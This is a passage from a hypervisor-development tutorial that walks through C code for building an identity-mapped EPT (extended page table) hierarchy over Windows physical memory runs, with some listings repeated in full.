    u64 page_count;
} physical_memory_run, *pphysical_memory_run;

typedef struct _physical_memory_desc
{
    u32 num_runs;
    u64 num_pages;
    physical_memory_run run[1];
} physical_memory_desc, *pphysical_memory_desc;

pphysical_memory_desc mm_get_physical_memory_block( void )
{
    return get_global_poi( "nt!MmPhysicalMemoryBlock" );
}

The get_global_poi function is a helper that uses symbols to locate MmPhysicalMemoryBlock within ntoskrnl. Our objective now is to initialize EPT entries for all physical memory pages accounted for in this table. However, you may have noticed we’ve only allocated our top-level paging structure. To complete the above we need to implement a few more functions that acquire (if they already exist) or allocate our additional paging structures. Recall that a page walk on a system with 4-level paging goes PML4 → PDPT → PDT → PT. We’ve allocated our PML4; now we need to determine if there is an existing EPT entry or if we need to allocate it. The logic is described in the diagram below, followed by the implementation of these functions with a brief explanation.

 

Figure 7. Flow of EPT hierarchy initialization.

As the diagram shows, we call a few parent functions to initialize the EPT hierarchies. Referring back to the eptm_initialize_pt function from earlier, we're going to complete the implementation by writing ept_create_mapping_4k and its associated functions. Within these functions you will see the traversal and validation of the additional paging structures: if the paging structure for the current level exists, we call mem_ptov and operate on the virtual address it returns; otherwise, we construct a new EPT entry, and lucky for us, we already have the allocation function defined. So, how will the other functions look? Let's see them below, and then how they fit into the bigger picture.
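
A few helpers the functions below lean on aren't shown elsewhere in the article, so here are assumed definitions for the per-level index macros, the PFN mask, the alignment check, and the ept_access_rights triple (PAGE_SIZE and PAGE_SHIFT come from the WDK headers).

// Assumed helper macros: 9-bit index extraction per paging level, the
// 4-level PFN mask, and a 4KB alignment helper.
#define X64_PFN_MASK              0x000FFFFFFFFFF000ULL
#define PAGE_ALIGN_4KB( pa )      ( ( pa ) & ~( ( u64 )PAGE_SIZE - 1 ) )

#define PML4_IDX( pa )            ( ( ( pa ) >> 39 ) & 0x1FF )
#define PML3_IDX( pa )            ( ( ( pa ) >> 30 ) & 0x1FF )
#define PML2_IDX( pa )            ( ( ( pa ) >> 21 ) & 0x1FF )
#define PML1_IDX( pa )            ( ( ( pa ) >> 12 ) & 0x1FF )

// Assumed RWX triple used to pass EPT permissions around.
typedef struct _ept_access_rights
{
    u64 rd : 1;
    u64 wr : 1;
    u64 x  : 1;
} ept_access_rights;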

static p64 ept_map_page_table( p64 entry )
{
    p64 ptable = NULL;
    page_entry_t *pxe = NULL;
    physical_address table_pa = { 0 };
    
    // Check if the referenced EPT entry is already present.
    //
    if( *entry != 0 )
    {
        table_pa.quad = ( i64 )( *entry & X64_PFN_MASK );
        ptable = mem_ptov( table_pa.quad );
        
        if( !ptable ) 
            return NULL;
    }
    else
    {
        // If allocation succeeds, construct the parent entry so it points
        // at the newly allocated table.
        //
        ptable = eptm_allocate_entry( &table_pa );
        if( !ptable )
            return NULL;
        
        pxe = ( page_entry_t* )entry;
        
        // Set access rights for the table entry: EPT access all = 7 (RWX).
        //
        pxe->epte.rd = 1;
        pxe->epte.wr = 1;
        pxe->epte.x = 1;
        
        // Set the PFN for the EPT entry; the bitfield stores the frame
        // number, so shift the physical address right by PAGE_SHIFT.
        //
        pxe->epte.pfn = ( u64 )table_pa.quad >> PAGE_SHIFT;
        
        pxe->epte.mt = 0x00;
    }
    
    return ptable;
}

p64 ept_create_mapping_4k( pept_state ept_state, ept_access_rights access, physical_address gpa, physical_address hpa )
{
    // Current page structure (starts at the topmost table).
    //
    p64 pmln = NULL;
    
    // Pointer to the entry within the current page structure.
    //
    p64 ps_ptr = NULL;
    page_entry_t *pxe = NULL;
    
    // Get the topmost page table (PML4)
    //
    pmln = ept_state->topmost_ps;
    ps_ptr = &pmln[ PML4_IDX( gpa.quad ) ];

    // Check and validate next table exists, allocate if not (PDPT)
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML3_IDX( gpa.quad ) ];

    // Check and validate PDT exists, allocate if not
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML2_IDX( gpa.quad ) ];

    // Get the PT if it exists, allocate if not
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML1_IDX( gpa.quad ) ];
    
    // Verify the page is aligned on a 4KB boundary; align down if not.
    //
    if( PAGE_ALIGN_4KB( hpa.quad ) != hpa.quad )
        hpa.quad &= ~( ( u64 )PAGE_SIZE - 1 );

    pxe = ( page_entry_t* )ps_ptr;
    
    // Set access rights requested by the caller.
    //
    pxe->epte.rd = access.rd;
    pxe->epte.wr = access.wr;
    pxe->epte.x = access.x;
    
    // Set the PFN for the EPT entry (frame number, not the masked address).
    //
    pxe->epte.pfn = ( u64 )hpa.quad >> PAGE_SHIFT;
    
    // Set the memory type for the page table entry.
    //
    pxe->epte.mt = hw_query_mtrr_memtype( gpa.quad );

    return ( p64 )pxe;
}

The functions given above ensure that a table is constructed if it hasn't been already; when it already exists, the code quickly falls through to the next check/allocation. There are some missing error checks, but to save space I only kept the main logic. With these functions, we can go back to eptm_initialize_pt and complete the implementation.

typedef struct _physical_memory_run
{
    u64 base_page;
    u64 page_count;
} physical_memory_run, *pphysical_memory_run;

typedef struct _physical_memory_desc
{
    u32 num_runs;
    u64 num_pages;
    physical_memory_run run[1];
} physical_memory_desc, *pphysical_memory_desc;

pphysical_memory_desc mm_get_physical_memory_block( void )
{
    return get_global_poi( "nt!MmPhysicalMemoryBlock" );
}

static p64 ept_map_page_table( p64 entry )
{
    p64 ptable = NULL;
    page_entry_t *pxe = NULL;
    physical_address table_pa = { 0 };
    
    // Check if the referenced EPT entry is already present.
    //
    if( *entry != 0 )
    {
        table_pa.quad = ( i64 )( *entry & X64_PFN_MASK );
        ptable = mem_ptov( table_pa.quad );
        
        if( !ptable ) 
            return NULL;
    }
    else
    {
        // If allocation succeeds, construct the parent entry so it points
        // at the newly allocated table.
        //
        ptable = eptm_allocate_entry( &table_pa );
        if( !ptable )
            return NULL;
        
        pxe = ( page_entry_t* )entry;
        
        // Set access rights for the table entry: EPT access all = 7 (RWX).
        //
        pxe->epte.rd = 1;
        pxe->epte.wr = 1;
        pxe->epte.x = 1;
        
        // Set the PFN for the EPT entry; the bitfield stores the frame
        // number, so shift the physical address right by PAGE_SHIFT.
        //
        pxe->epte.pfn = ( u64 )table_pa.quad >> PAGE_SHIFT;
        
        pxe->epte.mt = 0x00;
    }
    
    return ptable;
}

p64 ept_create_mapping_4k( pept_state ept_state, ept_access_rights access, physical_address gpa, physical_address hpa )
{
    // Current page structure (starts at the topmost table).
    //
    p64 pmln = NULL;
    
    // Pointer to the entry within the current page structure.
    //
    p64 ps_ptr = NULL;
    page_entry_t *pxe = NULL;
    
    // Get the topmost page table (PML4)
    //
    pmln = ept_state->topmost_ps;
    ps_ptr = &pmln[ PML4_IDX( gpa.quad ) ];

    // Check and validate next table exists, allocate if not (PDPT)
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML3_IDX( gpa.quad ) ];

    // Check and validate PDT exists, allocate if not
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML2_IDX( gpa.quad ) ];

    // Get the PT if it exists, allocate if not
    //
    pmln = ept_map_page_table( ps_ptr );
    ps_ptr = &pmln[ PML1_IDX( gpa.quad ) ];
    
    // Verify the page is aligned on a 4KB boundary; align down if not.
    //
    if( PAGE_ALIGN_4KB( hpa.quad ) != hpa.quad )
        hpa.quad &= ~( ( u64 )PAGE_SIZE - 1 );

    pxe = ( page_entry_t* )ps_ptr;
    
    // Set access rights requested by the caller.
    //
    pxe->epte.rd = access.rd;
    pxe->epte.wr = access.wr;
    pxe->epte.x = access.x;
    
    // Set the PFN for the EPT entry (frame number, not the masked address).
    //
    pxe->epte.pfn = ( u64 )hpa.quad >> PAGE_SHIFT;
    
    // Set the memory type for the page table entry.
    //
    pxe->epte.mt = hw_query_mtrr_memtype( gpa.quad );

    return ( p64 )pxe;
}

vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    p64 epte;
    physical_address ept_topmost_pa;
    physical_address pa;
    eptp_format eptp;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    eptp.value = ept_topmost_pa.quad;
    eptp.bits.memory_type = EPT_MEMORY_TYPE_WB;
    eptp.bits.guest_address_width = ept_state->gaw;
    eptp.bits.rsvd0 = 0;
    
    ept_state->eptp = eptp.value;
    
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    u32 idx = 0;
    u64 pn = 0;
    physical_memory_desc* pmem_desc = ( physical_memory_desc* )mm_get_physical_memory_block();
    ept_access_rights epte_ar = { .rd = 1, .wr = 1, .x = 1 };
    
    for( ; idx < pmem_desc->num_runs; idx++ )
    {
        physical_memory_run* pmem_run = &pmem_desc->run[ idx ];
        u64 base = ( pmem_run->base_page << PAGE_SHIFT );
        
        // For each physical page in the run, map a new EPT entry.
        //
        for( pn = 0; pn < pmem_run->page_count; pn++ ) 
        {
            pa.quad = ( i64 )( base + ( pn << PAGE_SHIFT ) );
            epte = ept_create_mapping_4k( ept_state, epte_ar, pa, pa );
            if( !epte ) 
            {
                // Unmap each of the entries allocated in the table.
                //
                ept_teardown_tables( ept_state );
                return VMM_LARGE_ALLOCATION_FAILED;
            }
        }
    }
    
    return VMM_OPERATION_SUCCESS;
}

This completes the initialization of our extended page table hierarchy; however, we're not quite out of the woods. We still need to implement our teardown functions to release all EPT resources and associated structures (unmap), EPT page walk helpers, EPT splitting methods, 2MB and 1GB page support, page merging, as well as GVA → GPA and GPA → HPA helpers. And of course, we can't forget our EPT violation handler.

Conclusion

There’s still a bit of work to do, and now that I finally have time to resume writing I’m hoping to have the next part out in a few weeks. The next article will spend time clearing up any confusion and residual requirements to get EPT functioning properly, including the details on the page walking mechanisms present on the platform, the logic, and how to implement our own that handles GVA → HPA translation smoothly. As you can see, the introduction of EPT adds a significant amount of background requirements. Because of this, the next article will primarily be explanations of small snippets of source and the logic used when constructing the routines. It’s important that readers get familiar, if not already, with paging and address translation; the added layers of indirection add a lot of complexity that can confuse the reader. There will also be other requirements that are not normally our concern, since the hardware/OS typically handles them when converting a guest virtual address to a guest physical address: checking reserved bits, the US flag, verifying page size, checking SMAP, the pkey, and so on. The page walking method will be a large part of the next article, as it’s important to properly traverse the paging structures.

As always, be sure to check the recommended reading! And please excuse the cluster-f of an article that this is. I had been writing it for a long time and cut out various parts that were written and then deemed unnecessary. In the end, it was still long and I wanted to get a fresh start in a new article as opposed to mashing it all in one — you probably didn’t want that either.

Thanks to @ajkhoury for cleaner macros to help with the address translation explanation.

Recommended Reading
